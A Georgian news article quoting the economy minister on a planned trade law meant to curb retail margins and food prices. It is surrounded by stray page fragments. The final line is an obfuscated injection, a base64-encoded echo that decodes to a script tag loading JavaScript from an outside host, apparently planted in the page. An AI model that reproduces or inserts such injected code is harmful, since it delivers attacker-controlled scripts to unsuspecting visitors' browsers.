celsiusi
ავერსი საქკაბელი
კერძო სექტორის გაძლიერება არ უნდა იყოს მომხმარებლების ხარჯზე. ამიტომ, მომხმარებლების უფლებების დაცვა თანაბარწილად ჩვენთვის ძალიან მნიშვნელოვანია და პირველი ამოცანაა, ჩვენი ქვეყნის მოსახლეობის ინტერესების დაცვა,-ამის შესახებ საქართველოს ვიცე-პრემიერმა, ეკონომიკისა და მდგრადი განვითარების მინისტრმა  "ღამის კურიერის" ეთერში განაცხადა.
როგორც მინისტრი განმარტავს, სურსათის ფასები ოპტიმალურ პირობებში უნდა ყალიბდებოდეს.
"კერძო სექტორის გაძლიერება არ უნდა იყოს მომხმარებლების ხარჯზე. ამიტომ, მომხმარებლების უფლებების დაცვა თანაბარწილად ჩვენთვის ძალიან მნიშვნელოვანია. პირველი ამოცანაა, ჩვენი ქვეყნის მოსახლეობის ინტერესების დაცვა. სწორედ ამ პრინციპებიდან გამომდინარე, ჩვენ ევროდირექტივის პრინციპებს ავსახავთ კანონში ვაჭრობის შესახებ, რომელიც დაარეგულირებს ურთიერთობას ვაჭრობაში მონაწილე მხარეებს შორის. დარეგულირდება ისეთი საკითხები, როგორიც არის მაგალითად, გადახდის ვადები, პასუხისმგებლობა ვადაგასულ პროდუქციაზე, ასევე დარეგულირდება პროდუქციის შეტანის საკითხები. დღეს, ასევე არსებობს ე.წ. გაყიდვების მიზნის მიღწევის შემთხვევაში დამატებითი პრემირება საცალო  ქსელების. ეს არის ე.წ. "ქეშბექები" ეს ყველაფერი არის გაზრდილი მარჟები.
დღეს, მიმდინარეობს პროცესი, მიმდინარეობს მუშაობა კანონზე. მაგრამ პრინციპების გაცნობა, რა თქმა უნდა, შეგვიძლია საზოგადოებისთვის. ის გაზრდილი მარკეტინგული ხარჯები, რომლებიც დღეს მომწოდებელს გააჩნია, რა თქმა უნდა, აისახება საბოლოოდ პროდუქციის ფასი და ძვირდება პროდუქცია, შედეგად ჩვენი მომხმარებელი გაძვირებულ პროდუქციას იღებს.
ამაზე საუბრობდა პრემიერ-მინისტრი, ეს ხარჯები არ არის ჩვენი მომხმარებლის გადასახადი. მომხმარებელმა მაქსიმალურად და ოპტიმალურ პირობებში უნდ მიიღოს პროდუქცია, ანუ მინიმალური მარჟებით, ეს არ არის მოსახლეობის დასაფინანსებელი, იგივე ბიზნესის გაფართოება. დარწმუნებული ვარ ყველა ოჯახისთვის საკმაოდ დიდი ტვირთია გაზრდილი სურსათის ფასები. სურსათის ფასები ოპტიმალურ პირობებში უნდა ყალიბდებოდეს,"-აცხადებს ლევან დავითაშვილი. 
429
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");